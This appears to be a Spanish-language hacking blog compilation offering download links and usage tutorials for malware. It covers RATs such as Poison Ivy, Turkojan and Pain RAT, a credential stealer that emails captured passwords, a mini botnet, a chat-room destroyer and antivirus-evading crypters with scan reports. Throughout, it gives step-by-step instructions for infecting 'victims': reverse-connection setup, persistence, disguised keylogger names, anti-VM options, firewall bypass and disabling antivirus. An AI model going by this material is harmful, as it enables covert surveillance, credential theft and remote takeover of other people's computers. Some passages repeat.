HACKEANDO HI5

Es un ejecutable compilado en Visual Basic
Descargalo aqui

Megaupload
Mediafire

Cómo se usa:

1. Para comenzar deben descargar el zip desde cualquiera de los dos enlaces que les proporcionamos: Megaupload o mediafire.

2. Descompriman el zip.

3. Al ejecutar el programa aparecerá una ventana como esta:


4. Escriban en donde dice "your friend's email" el correo de la víctima, y donde dice "your email" SU email. Tengan en cuenta que el email de la víctima tiene que ser el que usa para acceder a su hi5.

5. Cuando le den en "Go!" les dira que se esta conectando a hi5, luego que esta buscando, y por último les pondrá que ha terminado. Lo que sucede en pocas palabras es que el programa se conecta a www.hi5.com y busca en las bases de datos el correo de la víctima. Mediante un proceso llamado "bruteforce" obtiene la contraseña y la envía a vuestro correo. No es nada del otro mundo.

IMPORTANE:

Algunos antivirus y antiespías detectan el programa como una amenaza... No hace falta explicar por qué. Les recomendamos desactivar temporalmente vuestros antivirus y/o antiespías para que puedan utilizarlo.
Disfrutenlo

SH DESTROYER SBOT 1.0


~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨

Destroy[SH] 1.1 Modo de Uso:

Primer destroy Sb0t creado por el Team [SH]- System Help, Version 1.1, Con una comoda interface actualizada, Soporta

cualquier tipo de simbolos (=:-~) y cualquier tipo de fuentes y caritas, Este pequeño programa

fue diseñado para Defacear o Destruir cualquier sala Sb0t desde la version 4.23 en adelante, es compatible con todos los sistemas

operativos y es muy facil de usar..

Primero deben ejecutar el programa, personalizar los comandos a su preferencia, deben tener al minimo Pass o Nivel 3 en la sala que van a tumbar..

luego de tener todos esos requisitos en mano..dale click a tumbar sala..dirijes tu cursor asia la sala de chat, esperas 10 segundos y faaa..! la sala

estara totalmente tumbada y obsoleta para el acceso de cualquier usuario a la misma. Este Programa es exclusivamente para miembros del team [SH]

ya que contiene Quotes y ciertos comandos incorporados en lo interno del programa con el tag de [SH]..Disponible para todos los Integrantes del Team
~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨~¨

System Help Revolution-X 2007-2010


Descargar: (Descargar Destroy[SH]1.1 Gratis)

Video para que comprueben como funciona el Destroy [SH] 1.1 (Prueba) 



RECUPERA PASS DE MSN OLVIDADOS

Recupera contraseña de varios clientes de mensajería

Olvidar el usuario o la palabra de paso que da acceso a la cuenta de correo electrónico y al cliente de mensajería instantánea es un problema muy grave que se puede resolver gracias a MessenPass, una aplicación capaz de localizar el nombre de usuario y la contraseña de todos aquellos que iniciaron sesión en el equipo.

Los clientes de mensajería que soporta MessenPass son los siguientes: MSN Messenger, Windows Messenger, Windows Live Messenger, Yahoo Messenger (en versiones 5.x y 6.x), ICQ Lite 4.x/2003, AOL Instant Messenger, (aunque sólo antiguas versiones), Netscape 7; Trillian; Miranda y GAIM/Pidgin.

MessenPass no necesita instalación y su uso es sencillo, ya que en la pantalla inicial muestra los usuarios y las contraseñas, aunque tiene problemas para recuperar información de Trillian, Netscape, AIM, GAIM y Miranda.

Para resolverlo, vamos al menú ’archivo’, damis click en selección de fuentes (select folders) y buscarlo manualmente en tu PC. También puedes copiar, pegar o guardar las cuentas que desees en el bloc de notas y en otras aplicaciones. MEGA UTIL SI OLVIDAMOS NUESTROS PASS


MIXPOD

scb"labs mini bot net



 
Bueno usuarios ahora les deho
este programita muy bueno
en vdd etsa muy bueno un mini botnet
pero con muchas funciones
esérp les sirva en lo personal me gusto
Les deho unas caracteristaicas del mismo SarkI
>> Características :
- Website flood : Abre 6 veces la web en diferente frames integrados en el servidor.
- Shell command : Envia un comando MSDOS al servidor en modo oculto.
- Server options : Opciones del servidor (reiniciar, cerrar, desinstalar).
- Build server : Constructor del servidor.
- Edit port : Edita el puerto de escucha
- Sound notifier : Activa/Desactiva el sonido de notificación

>> Compatibilidad :
- Windows XP SP2/SP3 (100%)
- Windows Vista/Windows 7 (90%)
descarga:
MegaUpload

MSNVIRUSREMOVAL



MSN Virus Remover es capaz de detectar y eliminar cualquier virus creado específicamente para MSN Messenger y Windows Live Messenger.

El programa incluye una base de datos de más de 11.000 tipos de virus por lo que es capaz de localizar prácticamente cualquier malware creado para causar vulnerabilidad en el programa de mensajería instantánea.

Además, MSN Virus Remover no sólo limpia el programa de virus sino que también restaura la configuración de las funciones de restauración y administrador de tareas, reestablece el acceso al editor de Registro y permite el acceso a las opciones de carpetas.

Si tienes duda sobre un determinado comportamiento extraño de un usuario no dudes en contar con esta aplicación. Si tienes virus, el programa lo detectará y eliminará.

ARES 3.1.2.3033 [ORIGINAL]


 


caracteristicas 



REPRODUCTOR

BIBLIOTECA 







        
CHAT 

                









  





-DESCARGA MUSICA EN MP3.
-DESCARGA PELICULAS (DVD,VCD,DVDRIP)(infantiles,accion,drama,miedo,adultos,etc)
-DESCARGA VIDEOS DE TODO TIPO (MUSICALES,DOCUMENTALES,PORNO JAJA,ETC)
-DESCARGA SOFTWARE.
-DESCARGA JUEGOS (PC,XBOX,XBOX 360,PLAYSTATION 1,2,3,Wii,etc)
-DESCARGA LIBROS.
-DESCARGA IMAGENES.
-DESCARGA DOCUMENTOS (WORD,POWERPOINT,etc)
-DESCARGA TORRENTS.
-NAVEGA EN INTERNET CON ARES 3.
-REPRODUCTOR DE MUSICA Y VIDEOS.
-BIBLIOTECA PARA GUARDAR TUS DESCARGAS.
-CHAT ARES 3.
ETC.ETC.

INFINIDAD DE DESCARGAS CON ARES 3!

LINK:
http://rapidshare.com/files/287119072/NA3.rar

NOTA:
para poner el serial se van a panel de control y activar (en el ares 3 eh -obio) .


NOTA:
PUEDE QUE EN EL AREA DE CHAT NO TENGA LA FUNCION DE AVATAR PARA ESO LES DOI UN TIP SIMPLEMENTE TENGAN EL INSTALADOR DEL ARES ANTIGUO Y INSTALENLO DESPUES DE INSTALAR EL ARES 3 YA TERMINADA LA INSTALASION SE DARAN CUENTA DE QUE QUEDO DELUX HAHA SE VAN A SKINS SELECCIONAN BLUE O EL QUE GUSTEN DE LOS NUEVOS QUE TRAE Y LISTO TIENEN LA VITSTA NUEVA Y LAS FUNCIONES COMPLETAS  ESPERO LES GUSTE SALU2 XD

Schwarze Sonne RAT 0.3 Beta

Schwarze Sonne RAT 0.3 Beta

LO NUEVO
-Several Bugfixes
-New Connection Handling
-Usermode Unhooking (fwb)
-New Webcam Capture Method (efficient, more compitable)

Pictures:
Imagen
ImagenTRADUCCION EN POKAS PALABRAS TRANSMITE LAS IMAGENES DE LA WEB CAM BAJENSELO ES MUY FACIL Y SENCILLO DE USAR AUNKE VIENE EN INGLES NO ES MUY DIFICL DE ENTENDER

DESCARGAR;
   Download SS-RAT

FIREJOINER [INDETECTABLE]

Fire Joiner tambien para hacer indetectables los server de los troyanos
Imagen



File Info

Report generated: 15.1.2010 at 17.26.57 (GMT 1)
Filename: FireJoinerM0DByyorllandlegionpr.exe
File size: 458752 bytes
MD5 hash: 818d93dfb3943507ddddb0796e4fa44e
SHA1 hash: B6BE4989304D3F2188C3385C0B9CCDE59F9CB6AA
Detection rate: 21 on 24
Status: INFECTED

Detections

a-squared - Backdoor.Win32.VB!IK
Avira AntiVir - TR/Drop.FJoiner.A.2
Avast - Win32:Trojan-gen
AVG - Dropper.Generic.QXB
BitDefender - Trojan.Generic.127196
ClamAV - Trojan.Dropper-10234
Comodo - Trojan-Dropper.Win32.FJoiner.a
Dr.Web - Trojan.MulDrop.55914
Ewido - Dropper.FJoiner.a
F-PROT6 - W32/Dropper.GSS
G-Data - Trojan-Dropper.Win32.FJoiner.a A
Ikarus T3 - Backdoor.Win32.VB
Kaspersky - Trojan-Dropper.Win32.FJoiner.a
McAfee - Generic Dropper trojan
NOD32 v3 - Win32/TrojanDropper.Agent
Norman - Trojan W32/Smalldrp.SUW
Panda - Trj/Dropper.WF
QuickHeal - TrojanDropper.FJoiner.a
Solo Antivirus - TrojanDropper.Win32.FJoiner.A
Sophos - -
TrendMicro - -
VBA32 - Trojan-Dropper.Win32.FJoiner.a
VirusBuster - Trojan.DR.FJoiner.AT
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org



_____________________________0___________________________________

File Info

Report generated: 15.1.2010 at 14.58.39 (GMT 1)
Filename: FireJoinerModByBing_Bing.exe
File size: 438272 bytes
MD5 hash: ef0c124fd2610256c7ea870d0658f29f
SHA1 hash: 19CBC5E72DC8B88E844509204238E5C66D3F0F95
Detection rate: 2 on 24
Status: INFECTED

Detections

a-squared - -
Avira AntiVir - TR/Crypt.XPACK.Gen
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - Dropper.FJoiner.a
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org



________________________________0______________________________

File Info

Report generated: 15.1.2010 at 16.42.56 (GMT 1)
Filename: fire.dll
File size: 36864 bytes
MD5 hash: 310b80253cc4c50aec6c666154f56a4c
SHA1 hash: 0455A6519E0664F30344E39FFE03C77129EB0BD0
Detection rate: 1 on 24
Status: INFECTED

Detections

a-squared - -
Avira AntiVir - TR/Crypt.XPACK.Gen
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org


Descargos: Fire Joiner Mod By Bing_Bing.rar

PROCESS CRYPTER

Process Crypter Professional Edition 
 dejo esta preciosidad totalmente fud y funcional xp vista y 7.
este  nos sirve para dekar indetectables los server de nuestros troyanos.

Imagen

STUB

File Info

Report generated: 16.1.2010 at 0.34.35 (GMT 1)
Filename: stub.exe
File size: 128512 bytes
MD5 hash: fdfd5260d250ec61ae4537d040fa1290
SHA1 hash: EA7F0B61B8B24B0898AEC02D1D71CBAE4FAFF9AE
Detection rate: 0 on 23
Status: CLEAN

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org



Cybergate

File Info

Report generated: 16.1.2010 at 0.38.41 (GMT 1)
Filename: cybergateencriptado.exe
File size: 415371 bytes
MD5 hash: 9b59d93f5516f38bae12b04a930017a1
SHA1 hash: CB04C1AFEF095596796AE816242DE0254D129FE9
Detection rate: 0 on 23
Status: CLEAN

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org


Spy-Net

File Info

Report generated: 16.1.2010 at 0.40.27 (GMT 1)
Filename: spynet.exe
File size: 411275 bytes
MD5 hash: 50f9a86aa781d24810c9fe92aafbb1cc
SHA1 hash: 2CEAF2BEBFB2E71F88CB7C9F4341EE399E3DCEB5
Detection rate: 0 on 23
Status: CLEAN

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org


Poison

File Info

Report generated: 16.1.2010 at 0.42.10 (GMT 1)
Filename: poisonivy.exe
File size: 134795 bytes
MD5 hash: 7b881099aa6a0ccd6abb2801997c3d83
SHA1 hash: FDDE55BCF31D94410FD073FD4C3EA1E58711C567
Detection rate: 0 on 23
Status: CLEAN

Detections

a-squared - -
Avira AntiVir - -
Avast - -
AVG - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 v3 - -
Norman - -
Panda - -
QuickHeal - -
Solo Antivirus - -
Sophos - -
TrendMicro - -
VBA32 - -
VirusBuster - -
ZonerAntivirus - -

Scan report generated by
NoVirusThanks.org


Megaupload

http://www.megaupload.com/?d=BGIPHF1H

Mediafire

http://www.mediafire.com/?j0neiqtn2yn

ULTIMATE STEALER 1.0

Captura contraseñas de:
-Firefox
-Messenger
-Internet explorer 8
-No-IP
-Filezilla



Para usarlo solo deben colocar una cuenta de correo y su contraseña, preferiblemente gmail creada unicamente para usar con este programa. Despues colocan el destinatario que puede ser la misma cuenta. Y listo ya solo tienen que enviar el servidor y esperar que lleguen los datos.



Recuerden crearse una cuenta gmail unicamente para usar con este programa!

Descarga
Ultimate Stealer V1.0 (rapidshare)
Ultimate Stealer V1.0 (megaupload)
Ultimate Stealer V1.0 (depositfiles)
Pass: troyanosyvirus.com.ar

TROYANO RCBF INDETECTABLE POR DEFECTO

Troyano RCBF  Indetectable por defecto

Bueno debido a la gran cantidad de interrogante sobre ciertos troyanos y la forma de hacerlos indetectables; debido a su delicadeza que no admite cualquier binder o cripter porque se destruye el server, he creado este post que muestra las grandes cualidades del troyano RCBF y la forma de configurarlo.



VIDEO EN YOUTUBE:
http://es.youtube.com/watch?v=Juo9_1GgpAE


Estos  son algunos AV en los que me cago.


El venerado NOD32:




EL Norton AV




McAfee AV scan




AVG




Esta es una promoci?n del RCBF  comprobando sus grandes caracter?sticas; e conectado con todas los AV que e enviado aun me falta el ?kaspersky?  pero ya ver? lo mas seguro es que tambi?n sucumba jajaja esto sin bindearlo y sin encriptarlo.

AAA Y ANTES DE LLENAR ESTE POST DE GUEVONADAS?


RECUERDEN QUE NO EXISTE NINGUN TROYANO 100% INDETECTABLE



DESCARGA DEL RCBF:



http://www.4shared.com/file/67498075/3e2cdfbc/EDUCATIVO_RCBF.html?dirPwdVerified=908cb86c

APOKALYPSE RAT V1.4.2

Apocalypse RAT es una nueva herramienta de administracion remota creada por el turco APOCALYPSE, basado en el troyano Institution 2004 el RAT, se caracteriza por la cantidad de herramientas que posee.





esta es la imagen de mi pc acontinuacion unas imagenes cortesia de troyanosyviirus.com.ar






esta es la imagen de mi pc acontinuacion unas imagenes cortesia de troyanosyviirus.com.ar



Posee la mayoria de herramientas clasicas de cualquier RAT, como captura de pantalla, captura de camara, administrador de archivos, editor de registro, keylogger, informacion, shell remota, etc.
Tambien posee la posibilidad de enviar tareas a todas las pcs al mismo tiempo (broadcast).
El creador del server es muy completo, incluye un binder y la posibilidad de cambiar icono.

Caracteristicas del Apocalypse RAT






Version 1.4.2:
A bug that freezes Client fixed,also other small bugs fixed.
+ Icon Hunter Bug Fixed
+ File Manager Bug Fixed
+ Plugin Manager Added
+ Fast File Transfer and Traffic Encrypted.
+ Remote Shell Bug Solved.
+ Password Manager Bugs Solved.
+ transparency removed.
+ Clipboard Manager Bug Fixed.
+ Explorer Settings Bug Fixed.
+Crypt bug fixed.

Version 1.4.4: (14/12/09)
+FWB - DLL Injection, The DLL is Never Written To Disk
+Screen - Webcam Video Record
+Set Maximum Connnection
+Decent Strong Traffic Encryption + Compression
+All Reported Bugs Fixed.
+"Anti Crypt Lock" Unlocked. You can crypt server
+Small Server Size

Descarga
Apocalypse RAT v1.4.2 (rapidshare)
Apocalypse RAT v1.4.2 (megaupload)
Apocalypse RAT v1.4.2 (badongo)
Pass: troyanosyvirus.com.ar

Descarga (actualizado 14/12/09)
Apocalypse RAT v1.4.2 (rapidshare)
Apocalypse RAT v1.4.2 (megaupload)
Apocalypse RAT v1.4.2 (filefactory)
Pass: troyanosyvirus.com.ar

TURKOJAN 4.0 [HACKING]

TURKOJAN UN TEROYANO K ES DE LOS MAS FAMOSOS ASTA HOY AUNKE YA TIENE TIEMPO K SE PUBLICO BUENO COMENCEMOS

A ESTE TROYUANO SE LE AN AGREGADO VARIAS FUNCIONES FUN Y MEJORES LENGUAJES

Lo nuevo:

  • Remote Desktop feature added.You can view remote screen and control it via your keyboard and mouse.
     
  • Now you can record video from remote webcam.
     
  • Audio streaming feature added.
     
  • Now you don't need to download images from remote computer,you can view them with thumbnail manager.
     
  • You can get MSN logs with MSN Sniffer.
     
  • You can block harmful web-pages on remote computer.
     
  • You can manage remote computer with ms-dos commands.(Remote Shell)
     
  • New functions added for server secrecy
     
  • -Now it is harder to delete server
     
  • -Server can't be show in registry,searching files,msconfig,etc.
     
  • -Server can't be shown in ctrl+alt+del menu[Vista/Xp/95/98/ME].
     
  • -Server prevents system restoring.It deletes all system restore points.
     
  • Server size is %60 smaller now.
     
  • Connection bug fixed
     
  • Now server can't be dedectd by any anti-virus software,
     
  • but i think it will be dedected soon.
     
  • Some changes were made in Client appearance
     
  • Now advanced keylogger can capture clipboard changements.
     
  • You can install any file to remote computer from internet via Remote Downloader.
     
  • Now you can get more information about remote computer.
     
  • You can learn installed softwares on remote computer.
     
  • Help mode added.So you can create visible servers.


1- CEAR UNA CUENTA NO-IP
SI YA TIENES CUANTA NO-IP IGNORA ESTE PASO Y SI NO TIENES PUES REGISTRATE EN ESTE LINK KE PONGO AKI http://www.no-ip.com/  AKI SE CREA EL HOST K NOS AYUDARA A CONECTAR CON OTRA PC NO ES UN PROCEDIMIENTO DIFICIL ASI K PASARE AL PASO 2

2- DESPUS DE INSTALAR EL CLIENT LO ABRIMOS LE DAMOS CLICK EN LA PRIMERA CASILLA DE ARRIVA K ES DONDE ESTA EL IDIOMA AHI LE PONEMOS SPANISH XD







ASTA SE PUEDE VER K TENGO UN INFECTADO JAJAJAJA BUENO PASEMOS AL PASO 3


3- YA CON NUESTRA NO-IP CREADA LE DAMOS CLICK A EDITOR AHI AREMOS NUESTRO SERVER RECUERDEN K DEBEN TENER UN PUERTO ABIERTO PARA CONECTARNOS A LA VICTIMA POR EJEMPLO YO USO EL 81 AHI ESTA CONFIGURADO CON MI NO-IP Y TODO PERO RECUERDEN DEBE DE PONER LA SUYA Y SUS PUERTO ABIERTO Y SINO ABRaNLO xD dejamos EN EL EDITOR TAL Y COMO EN MI IMAGEN SOLO K CON SUS DATOS OK







DESPUES DE CONFIGURARLO TAL COMO ESTA LE DAMOS EN SALVAR Y NUESTRO TROYANO ESTARA CREADO YA CON EL SERVER CREADO LO GUARDAN EN ESCRITORIO AHORA A HACERLO INDETECTABLE


nota-- para que el troyano funcione recuerda tener el puerto por el que aras que la pc victima se conecte a la tuya
 
ahora vemos a haverlo indetectable como consejo yo recomiendo el CSBLAB








AKI ESTA LA IMAGEN EL USO DE ESTE PROGRAMA  ES MUY SENCILLO SOLO DEBEMOS DARLE CLICK EN EL RECTANGULO K ESTA EN SELECT FILE AHI SELECCIONAMOS NUESTRO SERVER Y DEJAMOS LAS CONFIGURACIONES DE ABAJO TAL Y COMO SE VE EN LA IMAGEN POR EJEMPLO YO SELECCIONE MI SERVER K SE LLAMA (JAKSJKASJKASKASJAK) ASI KEDA DESPUES DE K SELECCIONAS EL SERVER OVIAMENTE CON EL NOMBRE K TU ALLAS ESCOJIDO PARA EL TUYO DESPUES DEJAMOS LAS CONFIG. ASI COMO ESTA EN LA IMAGEN POR ULTIMO DAMOS CLICK A ENCRIPT FILE Y LISTO NOS APARECERA OTRO SERVER YA CON EL TROYANO INDETECTABLE INCLUIDO

NOTA -- La herramienta posee stubs detectados por algunos antivirus y otros no detectados, solo es cuestion de testear las distintas convinaciones de stubs. y ver k av los detecta ycual no asta ahora indetectable al nod32 bueno me despido espero les guste salu2


SCB Lab's - Proffessionall Malware Tool  ---- aki link de descarga al descaragarlo y keker abrirlo nos pedira un pass el pass es (troyanosyvirus.com.ar)

obiamente el malware fue tomado de ahi salu2

si el malware scblab no abre puede ser por k necesitas instalar el   COMDLG32.OCX o el MSWINSCK.OCX si presenta esos problemas de error deja tu post o tu mail y te lo solucionare ok me despido espero les alla gustado este post y tmbn espero les sirva by SH-TOXIC-X

Poison ivy, 2.3.1 [HACKING]

Poison ivy, version 2.3.1, es un poco mas indetectable que el 2.3.0, pero no creo que dure mucho tiempo por ser un troyano tan conocido, pero mejoraron bastantes bugs y agregaron algunas cositas. como principales cambios con respecto a la versión 2.3.0 tenemos:

->Device Manager, desde donde podemos administrar remotamente los dispositivos instalados, siendo posible Habilitar, Deshabilitar y Remover de manera segura algún dispositivo como teclado, mouse, impresora, CDROM, USB, etc.
->Ahora en cada conexión podemos tener una imagen en miniatura del escritorio de cada PC, la cual se va actualizando cada cierto tiempo, o cada vez que nosotros queramos, pudiendo modificar el tamaño de esta imagen.
->Se ha agregado la opción de crear una entrada de inicio en el registro dentro de HKLM/run.
->Ahora las carpetas seleccionadas, tanto en el file manager como en el registro, serán resaltadas de color rojo
->Podemos elegir si queremos o NO inyectar el proceso del server dentro de otro proceso. En la versión anterior se inyectaba por defecto en el navegador.
->Escuchar un sonido determinado con cada nueva conexión.
->Soporta las versiones 2.2.0 y 2.3.0
->Soporta Windows 2000/XP/2003/Vista HOME PREMIUM 07
->El color del ícono en la barra de tareas a cambiado de plomo a un simpático color verde

IMAGENES
 




Y aqui todos los cambios realizados oficialmente en ingles, no tengo tiempo para traducirlo pero se entiende de todas formas, si alguien lo quiere traducir asi lo postee se le agradeceria:

Changelog:

[+] - Feature added
[-] - Feature removed
[*] - Bug fixed on existing feature

[+] Device Manager
-> Save To File
-> Enable/Disable/Safe Removal
-> Display Info
-> Show hidden devices
[+] See ADS in file manager
[+] Expand/Collapse Tree in file and registry manager
[+] Thumbnail of desktop (gets updated every ping or manually by pinging), change size in settings
[+] Copy Profile
[+] HKLM/run startup
[+] Play sound on new connection
[+] Date in Connection Log
[+] Choose file alignment
[+] Choose to copy the file to ADS
[+] Selected folders/keys in file and registry manager are highlighted
[-] Share: inject into another process
[*] No need to restart servers that has been connected to older client
[*] Can now build non-injecting servers
[*] Changed the terms of use
[*] Troyanosyvirus.com.ar
[*] Uploading a file that already exists (but not in cache) will now be overwritten properly
[*] Update now works with servers that has different install paths
[*] Fixed a access violation when clicking Cancel too fast in the download dialog
[*] ActiveX now starts on restricted accounts too (must first be installed on admin account)
[*] Test Connection with Key File now works
[*] Clear Stats now doesnt remove active connection count
[*] Client should now be able to handle more active connections
[*] Load/Save bug fixed in DNS/Port editor
[*] Generate Key File had a bug causing it to generate weak passwords
[*] Fixed a bug that made it impossible to share new servers (2.3.0)
[*] Autosave images now saves with a timestamp

nota-- para que el troyano funcione recuerda tener el puerto por el que aras que la pc victima se conecte a la tuya
 
ahora vemos a haverlo indetectable como consejo yo recomiendo el CSBLAB








AKI ESTA LA IMAGEN EL USO DE ESTE PROGRAMA  ES MUY SENCILLO SOLO DEBEMOS DARLE CLICK EN EL RECTANGULO K ESTA EN SELECT FILE AHI SELECCIONAMOS NUESTRO SERVER Y DEJAMOS LAS CONFIGURACIONES DE ABAJO TAL Y COMO SE VE EN LA IMAGEN POR EJEMPLO YO SELECCIONE MI SERVER K SE LLAMA (JAKSJKASJKASKASJAK) ASI KEDA DESPUES DE K SELECCIONAS EL SERVER OVIAMENTE CON EL NOMBRE K TU ALLAS ESCOJIDO PARA EL TUYO DESPUES DEJAMOS LAS CONFIG. ASI COMO ESTA EN LA IMAGEN POR ULTIMO DAMOS CLICK A ENCRIPT FILE Y LISTO NOS APARECERA OTRO SERVER YA CON EL TROYANO INDETECTABLE INCLUIDO

NOTA -- La herramienta posee stubs detectados por algunos antivirus y otros no detectados, solo es cuestion de testear las distintas convinaciones de stubs. y ver k av los detecta ycual no asta ahora indetectable al nod32 bueno me despido espero les guste salu2

aki los link para descargar los archivos
Poison ivy 2.3.2 ( descarga de rapidshare)

SCB Lab's - Proffessionall Malware Tool  ---- aki link de descarga al descaragarlo y keker abrirlo nos pedira un pass el pass es (troyanosyvirus.com.ar)

obiamente el malware fue tomado de ahi salu2

PAINT RAT [TROYANO]

TUTORIAL Y Troyano Pain RAT CONEXION INVERSA


Este tutorial fue creado originalmente por DNSX en Terminal-minds y yo me tome el trabajo de editarle varios conseptos y una foto para la mejor comprencion del usuario aprendiz, espero lo disfriten, esta muy explicito.

Bueno empecemos:
Aqui vamos aver las partes por las cuales esta compuesto este troyano:



Configuracion:
Bueno, ahora vamos a configurar el server, osea a trabajar, le damos clic en la paleta build:



Primero tiene que darle un nombre a su perfil en "profile name" y luego le dan a create
bueno en "Server id" es el nombre que va a tener la victima cuando se infecte. EJ: New Titere
Donde sale "password", como su nombre lo dice es la contraseña que la necesitaras cuando configures el cliente. Donde dice IP/DNS alli es donde vas a poner tu no-ip o tu ip fija, da lo mismo si la ip es dinamica pero ten encuenta que tu al cambair de ip las victimas ya no se conectaran a ti. "Port" alli pones el puerto que quieras en este caso viene con el 3360 por defecto pero tu puedes cambiarlo al que quieras.



Le hacen clic a Startup, luego tildan "Policies Startup" En el key name le ponen lo que quieran, tambien tildan "ActiveX Startup" le dan a generate y lo dejan como esta tildan las 2 casillas de abajo, la primera es añadirle una shell y un startup al explorador de windows, el otro le mete un startup al usuario.



Le hacen clic a "Installation" y tildan copy server, en "EXE Name On Installation" le ponen el nombre del archivo que quieren que se copie al directorio correspondiente, en "Copy To" lo dejan como esta para que se copie al directorio de windows, "Process Mutex" Le dejancomo esta o lo editan o le dan a ramdom, es lomismo xD.
En "Enable Offline Key Logger", bueno aqui le ponen que si por que es el keylogger offline, y en el nombre le pueden poner el que quieran tambien, pero ojo, tiene que tener en cuenta de que la victima puede parfecerle sospechoso el nombre y lo borre o se de cuenta de que esta infectada asi que recomiendo ponerle nombres como: Systemdebug, Windowslicense, Microsoftvalidating, etc.

Aqui nos saltaremos el binder por que no tiene relevancia ni importancia que tenga que ver con el server, es simplemente un binder (joiner).



Le damos clic a "Stealth"
Aqui le tildan las 3 primeras casillas menos las 2 ultimas, aunque si quieren puden hacerlo, pero no lo hago apara que la victima no tenga ningun grado de sospecha al ver que se le desabilitaron cosas. (No recomendado tildar las dos ultimas)



Le damos clic a "Anti Debugging"
Bueno, alli tildan todo para comprobar de que ustedes no sean "estafados (y eso que nosotros somos los estafadores xD)" es para prevenir de que lo ejecuten en maquinas virtuales, infecte esa maquina y el tipo se de cuenta.(Elige todas)



Le damos clic en "Firewall Bypass"
Alli en "Inject To" lo dejan como esta, es para que el trojan se inyecte en su explorador de internet. Y la casilla que hay que tildar es para que si no encuentra el navegador predeterminado se lo inyecte a explore.exe que es el explorador de windows (El inicio, barra de tareas, etc).



Build server:
Bueno llegamos a la parte de crear el server, en "Save As" le ponen el nombre que quieran, es el nombre del archivo final. EJ: SystemUpdt.
Donde sale ".exe" y es un menu desplegable, le pueden elegir el formato,(recomiendo .exe) El cuadrado que esta en al esquina derecha, le hacen clic y eligen el icono. (No necesario si vas a fusionar el archivo con una foto u otro archivo posteriormente.)

En la casilla si quieren le hacen clic para que ocupe menos espacio, en micaso no lo hago para que el server sea mas pesado y asi menos sospechso xD. (No recomendado)
Le damos clic a "build server" y el server sera creado en la carpeta donde esta guardado el troyano.



Bueno esta es la ultima parte, le damos clic en la paleta settings, en "Reverse connection Port" ponen el puerto puesto anteriormente durante la creacion del server, en "maximun connections" son las maximas conneciones que pueden tener conectado, password es la contraseña que le pusieron antes durante la creacion del server, ping interval es el intervalo del ping, recomiendo ponerle 1, La primera casilla es apra que te indique cuando una conexion entro, la segunda es para notificarte que una se desconecto.
Presionan "Save Settings" y el server se te crean el carpeta contenedora.

Bueno alli quedo todo... y para los que no tienen el troyano:

DESCARGA DE LA WEB OFICIAL:

http://www.hackthedarkness.com/download.php?file=painrat0.1Beta9.zip

Pass: HackTheDarkness.com



ARES CHAT SERVER [SBOT 4.23]

AKI LES TRAIGO  UNA NUEVA VERSION DEL YA MUY CONOCIDO SBOT CHAT SERVER AKI LES DEJO SU VERSION MAS NUEVA Y ACTUALIZADA EL SBOT_CHAT_SERVER 4.23 BY SH-TOXIC-X  CON DOBLE AVATAR AKI ALGUNAS IMAGENES



COMO PUEDEN VER ES MUY SIMILAR AL SERVER ANTERIOR PERO LA NOVEDAD DE ESTE NUEVO SERVIDOR
ES K AHORA PODEMOS AGREGARLE UNA IMAGEN PREDETERMINADA A LOS USUARIOS K AUN NO TIENEN EL ARES CON AVATAR O K POR SUS SIMPLES GANAS NO KIEREN PONER UNA PIC AKI PODEMOS OBSERVAR LA CONFIGURACION DEL DOBLE AVATAR DEL SERVER




BUENO ESPERO LES LLA GUSTADO MI APORTE AHORA POR ULTIMO LES DEJO AQUI EL LINK PARA K SE LO DESCARGUEN
http://www.sharptricks.net/exe_files/sb0t.exe

ARES CHAT SERVER [SBOT 4.23]

AKI LES TRAIGO  UNA NUEVA VERSION DEL YA MUY CONOCIDO SBOT CHAT SERVER AKI LES DEJO SU VERSION MAS NUEVA Y ACTUALIZADA EL SBOT_CHAT_SERVER 4.23 BY SH-TOXIC-X  CON DOBLE AVATAR AKI ALGUNAS IMAGENES



COMO PUEDEN VER ES MUY SIMILAR AL SERVER ANTERIOR PERO LA NOVEDAD DE ESTE NUEVO SERVIDOR
